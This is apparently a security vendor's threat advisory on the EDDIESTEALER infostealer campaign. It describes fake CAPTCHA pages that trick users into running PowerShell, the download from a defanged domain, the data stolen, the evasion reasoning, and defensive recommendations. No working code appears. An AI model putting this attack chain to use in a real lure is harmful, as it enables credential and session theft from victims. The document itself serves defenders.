Threatcure Analysis: EDDIESTEALER Malware Campaign

/ Analysis / By

Overview
Threat actors are actively distributing a new Rust-based information stealer dubbed EDDIESTEALER, leveraging a deceptive social engineering method known as ClickFix. The campaign initiates infection via fake CAPTCHA verification pages embedded into compromised legitimate websites, tricking users into executing malicious PowerShell commands manually.
This unconventional infection chain allows attackers to bypass traditional security mechanisms and gain access to sensitive user data and system credentials.

Key Technical Details
Initial Access Vector

  • Malicious JavaScript (gverify.js) embedded in trusted websites poses as a CAPTCHA script.
  • The fake CAPTCHA prompts users to launch Windows + R and execute a PowerShell command—effectively triggering the malware manually.

Execution & Payload

  • PowerShell Script downloads EDDIESTEALER from llll[.]fit, saved in the Downloads folder under random names.
  • The Rust-based binary performs:
    • Credential harvesting
    • Cookie and session data extraction
    • System profiling

Stealth & Evasion

  • Manual user interaction avoids traditional sandbox analysis.
  • PowerShell-based delivery minimizes file detection footprints.
  • Uses randomized file names and trusted websites to appear legitimate.
  • Bypasses browser-level security by shifting execution responsibility to the OS layer.

Threat Implications

  • Bypasses EDR and automated defense systems due to manual execution.
  • High potential for mass infection due to abuse of real, popular websites.
  • Rust’s complexity makes static analysis and reverse engineering difficult.

Threatcure Recommendations
1. User Awareness & Policy Enforcement

  • Conduct targeted awareness training on social engineering tactics like ClickFix.
  • Issue internal advisories warning against executing PowerShell commands from unknown sources—even if prompted by a website.
  • Restrict PowerShell access for standard users where operationally feasible.

2. Endpoint and Network Protection

  • Enforce endpoint policies that block unauthorized PowerShell execution.
  • Monitor for unusual parent-child process relationships (e.g., browser → powershell.exe).
  • Use EDR solutions with behavioral analytics that flag command-line initiated downloads.

3. Web & DNS Filtering

  • Block or monitor outbound connections to known malicious domains such as llll[.]fit.
  • Inspect JavaScript loaded from third-party domains, particularly gverify.js activity.

4. Threat Hunting & Detection

  • Search logs for PowerShell commands executed shortly after browser activity.
  • Look for downloaded files in the Downloads folder with randomized names matching Rust binaries.

5. Incident Response Preparedness

  • Simulate ClickFix-style phishing in red team or tabletop exercises.
  • Develop and maintain YARA/Sigma rules for identifying EDDIESTEALER and related obfuscation techniques.

Conclusion
EDDIESTEALER’s distribution campaign highlights the growing convergence of advanced social engineering and manual execution techniques. The abuse of legitimate websites and the use of user-triggered scripts challenge conventional detection strategies.
Threatcure advises organizations to adopt a multi-layered defense approach that combines employee awareness, endpoint hardening, and real-time behavioral analysis to counteract evolving malware threats like EDDIESTEALER.